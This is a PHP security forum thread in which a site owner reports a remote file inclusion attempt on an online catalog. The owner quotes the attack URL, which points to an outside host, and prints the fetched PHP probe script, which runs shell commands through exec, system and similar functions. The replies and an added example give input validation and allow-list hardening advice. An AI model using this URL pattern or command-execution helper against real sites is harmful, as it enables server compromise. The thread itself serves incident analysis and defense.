Being Hacked

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

lupole
Forum Newbie
Posts: 1
Joined: Sun Jul 12, 2009 10:50 am

Being Hacked

Post by lupole »

Hello all.

I got hacked last night from Korea Republic IP 210.205.57.2. Browser: libwww-perl/5.79
This was a Bookmark entry and the landing page was:

myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???

Landing page should be this:

myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de

without the following:

///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???

When I point my browser to:

samjinenginc.com/board/readme.txt???

the below script shows. After this, the next stats entry does not show only this error blocking the IP and country addresses:

Warning: gethostbyaddr() [function.gethostbyaddr]: Address is not in a.b.c.d form in /www/myhomepage.com/web/catalog/admin/supertracker.php on line 549

After this entry, all other entries are normal.

Not sure as to the total function of this script, but it appears to be blocking me from getting certain IP addresses, and country information. Is there a way to block this script?

This also blocked my other tracking scripts.

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;

Thanks

matthijs
DevNet Master
Posts: 3360
Joined: Thu Oct 06, 2005 3:57 pm

Re: Being Hacked

Post by matthijs »

In your script, how is

?language=de

being used?

If you validate and filter that input well (as you should do with all input), it should not be possible to inject any code.
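As an added illustration of the point above (example code, not from the original post or from the poster's site): a handler for the language parameter that allow-lists the value and builds the include path from a location the request cannot influence. The file layout (includes/languages/<code>.php) and the list of language codes are assumptions.

```php
<?php
// Added example, not code from the original post. The directory layout and
// the language list below are assumptions.

// Weak pattern, the kind of code the URL in the post is aimed at: the path
// is built from $_SERVER['DOCUMENT_ROOT'] and an unchecked $language. On old
// PHP with register_globals on, a query string such as
// ?_SERVER[DOCUMENT_ROOT]=http://... can overwrite that value, so the
// include fetches a remote file instead of a local one.
//
//   include($_SERVER['DOCUMENT_ROOT'] . '/includes/languages/' . $language . '.php');

// Hardened version: strict allow-list, and __DIR__ as the base path.
// Keep register_globals=Off and allow_url_include=Off in php.ini as well.
const SUPPORTED_LANGUAGES = ['en', 'de', 'fr'];   // assumed list
const DEFAULT_LANGUAGE = 'en';

function resolveLanguageFile(?string $requested): string
{
    // Strict comparison: only an exact match with a known code is accepted,
    // so no character from the request ever reaches the file system path.
    $lang = in_array($requested, SUPPORTED_LANGUAGES, true)
        ? $requested
        : DEFAULT_LANGUAGE;

    return __DIR__ . '/includes/languages/' . $lang . '.php';
}

$language = isset($_GET['language']) ? (string) $_GET['language'] : null;
$file = resolveLanguageFile($language);

// Fail loudly and leave a trace rather than silently including nothing.
if (!is_file($file)) {
    error_log('language file missing: ' . $file);
    http_response_code(500);
    exit;
}

require $file;
```

Requests like the one in the post then fall back to the default language, and the only value that reaches the include is one of the constants in the allow-list.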